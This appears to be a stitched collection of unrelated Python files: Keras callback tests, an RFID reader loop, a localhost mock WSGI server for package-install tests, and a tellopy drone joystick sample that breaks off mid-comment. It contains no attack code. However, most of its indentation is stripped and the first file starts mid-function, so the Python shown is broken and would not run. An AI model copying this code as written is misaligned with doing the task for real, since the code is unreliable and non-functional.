# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
          # On Windows, \r\n line endings may cause us to read an empty line
          # after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@test_util.run_deprecated_v1
def test_TensorBoard(self):
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
yield (x_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
else:
yield (x_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
i += 1
i %= max_batch_index
# case: Sequential
with self.cached_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=temp_dir, histogram_freq=1, write_images=True,
write_grads=True, batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
# fit with validation data and accuracy
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
# fit generator with validation data
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data
# histogram_freq must be zero
tsb.histogram_freq = 0
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
callbacks=cbks,
verbose=0)
# fit generator with validation data and accuracy
tsb.histogram_freq = 1
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data and accuracy
tsb.histogram_freq = 0
model.fit_generator(
data_generator(True), len(x_train), epochs=2, callbacks=cbks)
assert os.path.exists(temp_dir)
@test_util.run_deprecated_v1
def test_TensorBoard_multi_input_output(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
filepath = os.path.join(tmpdir, 'logs')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
# simulate multi-input/output models
yield ([x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
else:
yield ([x_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
i += 1
i %= max_batch_index
inp1 = keras.Input((INPUT_DIM,))
inp2 = keras.Input((INPUT_DIM,))
inp = keras.layers.add([inp1, inp2])
hidden = keras.layers.Dense(2, activation='relu')(inp)
hidden = keras.layers.Dropout(0.1)(hidden)
output1 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
output2 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
model = keras.models.Model([inp1, inp2], [output1, output2])
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [keras.callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
batch_size=5)]
# fit without validation data
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
callbacks=callbacks_factory(histogram_freq=0), epochs=3)
# fit with validation data and accuracy
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1), epochs=2)
# fit generator without validation data
model.fit_generator(data_generator(True), len(x_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(x_train), epochs=2,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
@test_util.run_deprecated_v1
def test_Tensorboard_histogram_summaries_in_test_function(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.steps_seen = []
def add_summary(self, summary, global_step):
summary_obj = summary_pb2.Summary()
# ensure a valid Summary proto is being sent
if isinstance(summary, bytes):
summary_obj.ParseFromString(summary)
else:
assert isinstance(summary, summary_pb2.Summary)
summary_obj = summary
# keep track of steps seen for the merged_summary op,
# which contains the histogram summaries
if len(summary_obj.value) > 1:
self.steps_seen.append(global_step)
def flush(self):
pass
def close(self):
pass
def _init_writer(obj):
obj.writer = FileWriterStub(obj.log_dir)
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
with self.cached_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
keras.callbacks.TensorBoard._init_writer = _init_writer
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
self.assertAllEqual(tsb.writer.steps_seen, [0, 1, 2, 3, 4, 5])
@test_util.run_deprecated_v1
def test_Tensorboard_histogram_summaries_with_generator(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
def generator():
x = np.random.randn(10, 100).astype(np.float32)
y = np.random.randn(10, 10).astype(np.float32)
while True:
yield x, y
with self.cached_session():
model = testing_utils.get_small_sequential_mlp(
num_hidden=10, num_classes=10, input_dim=100)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation generator
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
validation_steps=2,
callbacks=cbks,
verbose=0)
with self.assertRaises(ValueError):
# fit with validation generator but no
# validation_steps
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
callbacks=cbks,
verbose=0)
self.assertTrue(os.path.exists(tmpdir))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
      # Start an arbitrary thread that should run during model
      # training and be stopped after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_TensorBoard_with_ReduceLROnPlateau(self):
with self.cached_session():
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy'])
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', factor=0.5, patience=4, verbose=1),
keras.callbacks.TensorBoard(log_dir=temp_dir)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert os.path.exists(temp_dir)
@test_util.run_deprecated_v1
def test_Tensorboard_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.batches_logged = []
self.summary_values = []
self.summary_tags = []
def add_summary(self, summary, step):
self.summary_values.append(summary.value[0].simple_value)
self.summary_tags.append(summary.value[0].tag)
self.batches_logged.append(step)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
for batch in range(5):
tb_cbk.on_batch_end(batch, {'acc': batch})
self.assertEqual(tb_cbk.writer.batches_logged, [0, 1, 2, 3, 4])
self.assertEqual(tb_cbk.writer.summary_values, [0., 1., 2., 3., 4.])
self.assertEqual(tb_cbk.writer.summary_tags, ['batch_acc'] * 5)
@test_util.run_deprecated_v1
def test_Tensorboard_epoch_and_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
def add_summary(self, summary, step):
if 'batch_' in summary.value[0].tag:
self.batch_summary = (step, summary)
elif 'epoch_' in summary.value[0].tag:
self.epoch_summary = (step, summary)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0})
batch_step, batch_summary = tb_cbk.writer.batch_summary
self.assertEqual(batch_step, 0)
self.assertEqual(batch_summary.value[0].simple_value, 5.0)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='epoch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_epoch_end(0, {'acc': 10.0})
epoch_step, epoch_summary = tb_cbk.writer.epoch_summary
self.assertEqual(epoch_step, 0)
self.assertEqual(epoch_summary.value[0].simple_value, 10.0)
@test_util.run_in_graph_and_eager_modes
def test_Tensorboard_eager(self):
temp_dir = tempfile.mkdtemp(dir=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='binary_crossentropy',
optimizer=adam.AdamOptimizer(0.01),
metrics=['accuracy'])
cbks = [keras.callbacks.TensorBoard(log_dir=temp_dir)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertTrue(os.path.exists(temp_dir))
@test_util.run_deprecated_v1
def test_TensorBoard_update_freq(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.batch_summaries = []
self.epoch_summaries = []
def add_summary(self, summary, step):
if 'batch_' in summary.value[0].tag:
self.batch_summaries.append((step, summary))
elif 'epoch_' in summary.value[0].tag:
self.epoch_summaries.append((step, summary))
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
# Epoch mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='epoch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(tb_cbk.writer.batch_summaries, [])
tb_cbk.on_epoch_end(0, {'acc': 10.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.epoch_summaries), 1)
# Batch mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
self.assertFalse(tb_cbk.writer.epoch_summaries)
# Integer mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq=20)
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertFalse(tb_cbk.writer.batch_summaries)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
tb_cbk.on_batch_end(0, {'acc': 10.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
self.assertFalse(tb_cbk.writer.epoch_summaries)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
if __name__ == '__main__':
test.main()
|
rfid.py
|
import threading
import server
from api import crud
import sys
import helper
import time
def start_rfid_reader():
print("Starting RFID Reader...")
x = threading.Thread(target=read_rfid_forever, daemon=True)
x.start()
print("Started RFID Reader.")
def read_rfid_forever():
print("Starting read_rfid_forever...")
try:
if helper.running_on_raspberrypi():
from mfrc522 import SimpleMFRC522
reader = SimpleMFRC522()
else:
reader = None
    except Exception:
        print("'read_rfid_forever' error while initializing RFID reader:", sys.exc_info()[0])
reader = None
while True:
        # loop forever
try:
# Do we even have an RFID reader?
if reader is None:
                # Fake it option - sleep a while, then pretend someone just scanned an RFID tag, repeatedly...
#time.sleep(15)
#id="225534814579"
                # Don't fake it: there is no RFID reader, so exit this reader loop entirely; it can never succeed without the hardware.
return
else:
id, text = reader.read()
print(f"Read RFID Token:[{id}]")
server.notify_client(id, next(crud.get_db()))
        except Exception:
            print("[ERROR]:", sys.exc_info()[0])
|
server.py
|
import os
import signal
import ssl
import threading
from base64 import b64encode
from contextlib import contextmanager
from textwrap import dedent
from typing import TYPE_CHECKING, Any, Callable, Dict, Iterable, Iterator
from unittest.mock import Mock
from werkzeug.serving import BaseWSGIServer, WSGIRequestHandler
from werkzeug.serving import make_server as _make_server
from .compat import nullcontext
if TYPE_CHECKING:
from wsgi import StartResponse, WSGIApplication, WSGIEnvironment
Body = Iterable[bytes]
class MockServer(BaseWSGIServer):
mock: Mock = Mock()
# Applies on Python 2 and Windows.
if not hasattr(signal, "pthread_sigmask"):
    # We're not relying on this behavior anywhere currently; it's just best
# practice.
blocked_signals = nullcontext
else:
@contextmanager
def blocked_signals() -> Iterator[None]:
"""Block all signals for e.g. starting a worker thread."""
# valid_signals() was added in Python 3.8 (and not using it results
# in a warning on pthread_sigmask() call)
mask: Iterable[int]
try:
mask = signal.valid_signals()
except AttributeError:
mask = set(range(1, signal.NSIG))
old_mask = signal.pthread_sigmask(signal.SIG_SETMASK, mask)
try:
yield
finally:
signal.pthread_sigmask(signal.SIG_SETMASK, old_mask)
class _RequestHandler(WSGIRequestHandler):
def make_environ(self) -> Dict[str, Any]:
environ = super().make_environ()
# From pallets/werkzeug#1469, will probably be in release after
# 0.16.0.
try:
# binary_form=False gives nicer information, but wouldn't be
# compatible with what Nginx or Apache could return.
peer_cert = self.connection.getpeercert(binary_form=True)
if peer_cert is not None:
# Nginx and Apache use PEM format.
environ["SSL_CLIENT_CERT"] = ssl.DER_cert_to_PEM_cert(
peer_cert,
)
except ValueError:
# SSL handshake hasn't finished.
self.server.log("error", "Cannot fetch SSL peer certificate info")
except AttributeError:
# Not using TLS, the socket will not have getpeercert().
pass
return environ
def _mock_wsgi_adapter(
mock: Callable[["WSGIEnvironment", "StartResponse"], "WSGIApplication"]
) -> "WSGIApplication":
"""Uses a mock to record function arguments and provide
the actual function that should respond.
"""
def adapter(environ: "WSGIEnvironment", start_response: "StartResponse") -> Body:
try:
responder = mock(environ, start_response)
except StopIteration:
raise RuntimeError("Ran out of mocked responses.")
return responder(environ, start_response)
return adapter
def make_mock_server(**kwargs: Any) -> MockServer:
"""Creates a mock HTTP(S) server listening on a random port on localhost.
The `mock` property of the returned server provides and records all WSGI
interactions, so one approach to testing could be
server = make_mock_server()
        server.mock.side_effect = [
page1,
page2,
]
with server_running(server):
# ... use server...
...
assert server.mock.call_count > 0
call_args_list = server.mock.call_args_list
# `environ` is a dictionary defined as per PEP 3333 with the associated
# contents. Additional properties may be added by werkzeug.
environ, _ = call_args_list[0].args
assert environ["PATH_INFO"].startswith("/hello/simple")
Note that the server interactions take place in a different thread, so you
do not want to touch the server.mock within the `server_running` block.
Note also for pip interactions that "localhost" is a "secure origin", so
be careful using this for failure tests of `--trusted-host`.
"""
kwargs.setdefault("request_handler", _RequestHandler)
mock = Mock()
app = _mock_wsgi_adapter(mock)
server = _make_server("localhost", 0, app=app, **kwargs)
server.mock = mock
return server
@contextmanager
def server_running(server: BaseWSGIServer) -> Iterator[None]:
"""Context manager for running the provided server in a separate thread."""
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
with blocked_signals():
thread.start()
try:
yield
finally:
server.shutdown()
thread.join()
# Helper functions for making responses in a declarative way.
def text_html_response(text: str) -> "WSGIApplication":
def responder(environ: "WSGIEnvironment", start_response: "StartResponse") -> Body:
start_response(
"200 OK",
[
("Content-Type", "text/html; charset=UTF-8"),
],
)
return [text.encode("utf-8")]
return responder
def html5_page(text: str) -> str:
return (
dedent(
"""
<!DOCTYPE html>
<html>
<body>
{}
</body>
</html>
"""
)
.strip()
.format(text)
)
def index_page(spec: Dict[str, str]) -> "WSGIApplication":
def link(name: str, value: str) -> str:
return '<a href="{}">{}</a>'.format(value, name)
links = "".join(link(*kv) for kv in spec.items())
return text_html_response(html5_page(links))
def package_page(spec: Dict[str, str]) -> "WSGIApplication":
def link(name: str, value: str) -> str:
return '<a href="{}">{}</a>'.format(value, name)
links = "".join(link(*kv) for kv in spec.items())
return text_html_response(html5_page(links))
def file_response(path: str) -> "WSGIApplication":
def responder(environ: "WSGIEnvironment", start_response: "StartResponse") -> Body:
size = os.stat(path).st_size
start_response(
"200 OK",
[
("Content-Type", "application/octet-stream"),
("Content-Length", str(size)),
],
)
with open(path, "rb") as f:
return [f.read()]
return responder
def authorization_response(path: str) -> "WSGIApplication":
correct_auth = "Basic " + b64encode(b"USERNAME:PASSWORD").decode("ascii")
def responder(environ: "WSGIEnvironment", start_response: "StartResponse") -> Body:
if environ.get("HTTP_AUTHORIZATION") == correct_auth:
size = os.stat(path).st_size
start_response(
"200 OK",
[
("Content-Type", "application/octet-stream"),
("Content-Length", str(size)),
],
)
else:
start_response(
"401 Unauthorized",
[
("WWW-Authenticate", "Basic"),
],
)
with open(path, "rb") as f:
return [f.read()]
return responder
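# The block below is an illustrative addition, not part of the original module:
# a minimal sketch of how make_mock_server(), the page helpers and
# server_running() compose, following the make_mock_server() docstring.  The
# page spec and URLs are made-up examples rather than fixtures used by tests.
def _example_usage() -> Any:
    server = make_mock_server()
    # Each queued WSGI app answers exactly one request, in order.
    server.mock.side_effect = [
        index_page({"simple": "/simple/"}),
        package_page({"simple-1.0.tar.gz": "/files/simple-1.0.tar.gz"}),
    ]
    with server_running(server):
        # An HTTP client would talk to http://localhost:<server.server_port>/
        # here; per the docstring, do not touch server.mock inside this block.
        pass
    # Only inspect the recorded WSGI interactions after shutdown.
    return server.mock.call_args_list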
|
joystick_and_video.py
|
"""
tellopy sample using a joystick and video player
- you can use a PS3/PS4/XONE joystick to control a DJI Tello with the tellopy module
- you must install mplayer to replay the video
- Xbox One controllers were only tested on Mac OS with the 360Controller driver.
  get it here -> https://github.com/360Controller/360Controller
"""
import time
import sys
import tellopy
import pygame
import pygame.locals
from subprocess import Popen, PIPE
import threading
import av
import cv2.cv2 as cv2 # for avoidance of pylint error
import numpy
import time
import traceback
class JoystickPS3:
# d-pad
UP = 4 # UP
DOWN = 6 # DOWN
ROTATE_LEFT = 7 # LEFT
ROTATE_RIGHT = 5 # RIGHT
# bumper triggers
TAKEOFF = 11 # R1
LAND = 10 # L1
# UNUSED = 9 #R2
# UNUSED = 8 #L2
# buttons
FORWARD = 12 # TRIANGLE
BACKWARD = 14 # CROSS
LEFT = 15 # SQUARE
RIGHT = 13 # CIRCLE
# axis
LEFT_X = 0
LEFT_Y = 1
RIGHT_X = 2
RIGHT_Y = 3
LEFT_X_REVERSE = 1.0
LEFT_Y_REVERSE = -1.0
RIGHT_X_REVERSE = 1.0
RIGHT_Y_REVERSE = -1.0
DEADZONE = 0.1
class JoystickPS4:
# d-pad
UP = -1 # UP
DOWN = -1 # DOWN
ROTATE_LEFT = -1 # LEFT
ROTATE_RIGHT = -1 # RIGHT
# bumper triggers
TAKEOFF = 5 # R1
LAND = 4 # L1
# UNUSED = 7 #R2
# UNUSED = 6 #L2
# buttons
FORWARD = 3 # TRIANGLE
BACKWARD = 1 # CROSS
LEFT = 0 # SQUARE
RIGHT = 2 # CIRCLE
# axis
LEFT_X = 0
LEFT_Y = 1
RIGHT_X = 2
RIGHT_Y = 3
LEFT_X_REVERSE = 1.0
LEFT_Y_REVERSE = -1.0
RIGHT_X_REVERSE = 1.0
RIGHT_Y_REVERSE = -1.0
DEADZONE = 0.08
class JoystickPS4ALT:
# d-pad
UP = -1 # UP
DOWN = -1 # DOWN
ROTATE_LEFT = -1 # LEFT
ROTATE_RIGHT = -1 # RIGHT
# bumper triggers
TAKEOFF = 5 # R1
LAND = 4 # L1
# UNUSED = 7 #R2
# UNUSED = 6 #L2
# buttons
FORWARD = 3 # TRIANGLE
BACKWARD = 1 # CROSS
LEFT = 0 # SQUARE
RIGHT = 2 # CIRCLE
# axis
LEFT_X = 0
LEFT_Y = 1
RIGHT_X = 3
RIGHT_Y = 4
LEFT_X_REVERSE = 1.0
LEFT_Y_REVERSE = -1.0
RIGHT_X_REVERSE = 1.0
RIGHT_Y_REVERSE = -1.0
DEADZONE = 0.08
class JoystickXONE:
# d-pad
UP = 0 # UP
DOWN = 1 # DOWN
ROTATE_LEFT = 2 # LEFT
ROTATE_RIGHT = 3 # RIGHT
# bumper triggers
TAKEOFF = 9 # RB
LAND = 8 # LB
# UNUSED = 7 #RT
# UNUSED = 6 #LT
# buttons
FORWARD = 14 # Y
BACKWARD = 11 # A
LEFT = 13 # X
RIGHT = 12 # B
# axis
LEFT_X = 0
LEFT_Y = 1
RIGHT_X = 2
RIGHT_Y = 3
LEFT_X_REVERSE = 1.0
LEFT_Y_REVERSE = -1.0
RIGHT_X_REVERSE = 1.0
RIGHT_Y_REVERSE = -1.0
DEADZONE = 0.09
class JoystickTARANIS:
# d-pad
UP = -1 # UP
DOWN = -1 # DOWN
ROTATE_LEFT = -1 # LEFT
ROTATE_RIGHT = -1 # RIGHT
# bumper triggers
TAKEOFF = 12 # left switch
LAND = 12 # left switch
# UNUSED = 7 #RT
# UNUSED = 6 #LT
# buttons
FORWARD = -1
BACKWARD = -1
LEFT = -1
RIGHT = -1
# axis
LEFT_X = 3
LEFT_Y = 0
RIGHT_X = 1
RIGHT_Y = 2
LEFT_X_REVERSE = 1.0
LEFT_Y_REVERSE = 1.0
RIGHT_X_REVERSE = 1.0
RIGHT_Y_REVERSE = 1.0
DEADZONE = 0.01
prev_flight_data = None
run_recv_thread = True
new_image = None
flight_data = None
log_data = None
buttons = None
speed = 100
throttle = 0.0
yaw = 0.0
pitch = 0.0
roll = 0.0
def handler(event, sender, data, **args):
global prev_flight_data
global flight_data
global log_data
drone = sender
if event is drone.EVENT_FLIGHT_DATA:
if prev_flight_data != str(data):
print(data)
prev_flight_data = str(data)
flight_data = data
elif event is drone.EVENT_LOG_DATA:
log_data = data
else:
print('event="%s" data=%s' % (event.getname(), str(data)))
def update(old, new, max_delta=0.3):
if abs(old - new) <= max_delta:
res = new
else:
res = 0.0
return res
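# Worked example for update() (illustrative values only): with the default
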